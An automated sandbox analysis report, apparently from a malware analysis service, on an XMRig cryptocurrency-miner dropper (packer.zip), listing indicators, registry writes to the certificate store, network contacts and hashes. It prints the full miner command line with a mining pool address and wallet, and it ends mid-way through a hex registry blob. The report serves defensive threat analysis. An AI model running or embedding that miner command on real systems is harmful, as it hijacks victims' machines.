Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 18:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2036 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2036 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2376-16-0x000001E73C8F0000-0x000001E73C910000-memory.dmp
memory/2376-17-0x000001E7D0660000-0x000001E7D0680000-memory.dmp
memory/2376-18-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-19-0x000001E7D0CB0000-0x000001E7D0CD0000-memory.dmp
memory/2376-20-0x000001E7D0CD0000-0x000001E7D0CF0000-memory.dmp
memory/2376-21-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-22-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-25-0x000001E7D0CD0000-0x000001E7D0CF0000-memory.dmp
memory/2376-24-0x000001E7D0CB0000-0x000001E7D0CD0000-memory.dmp
memory/2376-23-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-26-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-27-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-28-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-29-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-30-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-31-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-32-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-33-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-34-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-35-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-36-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-37-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-38-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-39-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-40-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-41-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-42-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-43-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-44-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-45-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-46-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-47-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-48-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-49-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-50-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-51-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-52-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-53-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-54-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-55-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-56-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-57-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-58-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-59-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-60-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-61-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-62-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-63-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-64-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-65-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-66-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-67-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-68-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-69-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-70-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-71-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-72-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-73-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-74-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-75-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-76-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-77-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-78-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-79-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-80-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-81-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-82-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-83-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-84-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2